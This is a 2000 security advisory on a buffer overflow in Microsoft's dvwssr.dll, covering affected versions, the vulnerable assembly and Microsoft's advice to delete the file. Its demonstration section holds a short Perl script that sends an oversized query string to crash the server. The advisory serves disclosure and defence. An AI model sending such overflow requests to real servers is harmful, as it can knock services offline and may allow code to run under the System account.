Buffer Overflow in Microsoft Web Component
Reported April 14, 2000 by
rain.forrest.puppy and CORE SDI
VERSIONS EFFECTED
  • Component Visual InterDev 1.0 that ships with:
  • Windows NT 4.0 Option Pack (primary distribution for IIS 4.0)
  • Personal Web Server 4.0 (ships as part of Win95/98)
  • Front Page 98 Server Extensions

DESCRIPTION

The affected item, dvwssr.dll, is a server-side component used to support the Link View feature in Visual Interdev 1.0. The component contains a buffer overflow condition, which if overrun with random data could crash the server may even allow arbitrary code to run on the server under the context of the all-powerful System account.

According to Gerardo Richarte of CORE-SDI, The code where the buffer overflow resides is as follows:

mov eax, \[edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString\]
test eax, eax
jz _text_581813FD
push eax
lea eax, \[esp+14h+queryStringCoph\]
push eax
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW
test eax, eax
jz _text_581813FD
lea eax, \[esp+10h+queryStringCoph\]
push eax
call unescape_url

In addition to the overflow condition, Microsoft"s bulletin indicates a potential permissions problem: "By default, the affected component, Dvwssr.dll, resides in a folder whose permissions only allow web authors to execute it. Under these conditions, only a person with web author privileges could exploit the vulnerability - but a web author already has the ability to upload and execute code of his choice, so this case represents little additional threat. However, if the permissions on the folder were set inappropriately, or the .dll were copied to a folder with lower permissions, it could be possible for other users to execute the component and exploit the vulnerability."

DEMONSTRATION

A simple PERL script can cause the crash:

#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";

VENDOR RESPONSE

Microsoft has issued a security bulleting (MS00-025) that recommends that users delete all copies of the dvwssr.dll file on their Web systems. Doing so will break the Link View functionality of Visual InterDev, however since that package is so old, Microsoft feels that only a few users still use the older development platform and therefore, only a few users will be affected by deleting the file. Be sure to read Support Online article Q259799

To delete the file, use the "Find | Files or Folders" utility on the Start Menu to search all directories on your Web server file systems for "dvwssr.dll." The utility will locate all copies of the affected DLL. Once the search is complete, right-click on each instance of the file in the dialog and select Delete to remove the file from your system. Be sure to empty the Recycle Bin after you have deleted the files. This way no one can inadvertantly restore those files back onto the system. 

CREDITS
Discovered and reported by
rain.forrest.puppy and CORE-SDI